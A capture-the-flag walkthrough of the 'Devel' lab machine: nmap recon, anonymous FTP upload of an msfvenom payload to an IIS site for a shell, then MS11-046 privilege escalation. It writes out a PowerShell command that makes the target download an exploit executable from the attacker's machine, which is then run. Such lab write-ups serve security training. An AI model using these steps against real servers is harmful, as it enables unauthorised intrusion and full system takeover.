Devel

Recon

First lets start with a nmap scan. This will give us some info like open ports.

scan

From the nmap scan results we see that port 21 and 80 are open.

• port 21 is used for ftp

  • ftp or file transfer protocol. FTP is used to distribute large files across the web server or to upload files to an online server.

• port 80 is used for Hypertext Transfer Protocol (HTTP)

  • This port is a common one in TCP. It sends and receive requested web page.

Since port 80 is open lets enter the ip address in the search bar and see what pops up.

page

It appears we have some sort of welcome page? At first glance we see IIS7. And if we click the web page we get taken to a microsoft web page that talks about IIS.

ms

Next lets take a look at the source code.

code

Since the site uses IIS we can use this to our advantage.

FTP

From our nmap scan we see that ftp allows Anonymous logins. We use the ftp command in the terminal.

ftp

We successfully connected and using ls we can see what files.

Using this connection we can put files in the web server. For example lets put a text file just to test it.

filetransfer

Now lets call the file from the webpage.

blah

Now instead of a txt file lets create a payload using msfvenom.

msfvenom

And just like the txt file we will put the payload in the server with ftp. And once the we call the file we can see command prompt.

shell

However it seems that access is denied....

denied

Seems we need to try some privilege escalation lets take a look at the system information.

info

We see that the OS version is 6.1.7600 N/A Build 7600, using all the information lets look for an exploit.

exploit

After a couple of google searches I found a priv sec exploit.

• MS11-046

An elevation of privilege vulnerability exists where the AFD improperly validates input passed from user mode to the kernel. An attacker must have valid logon credentials and be able to log on locally to exploit the vulnerability. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM privileges).

First we download the MS11-046 from github.

github

Then using powershell and python we can have the target download this exe from our machine.

We will use python http server to send the files and establish a connection.

    powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.27:8000/ms11-046.exe', 'c:\Users\Public\Downloads\ms11-046.exe')"

This command will download the exe to the target, placing it in the download folder.

server

Our file was sent successfully!!

Now lets change to the download folder and run our exe.

exe

It works now all thats left to find the flags.

flags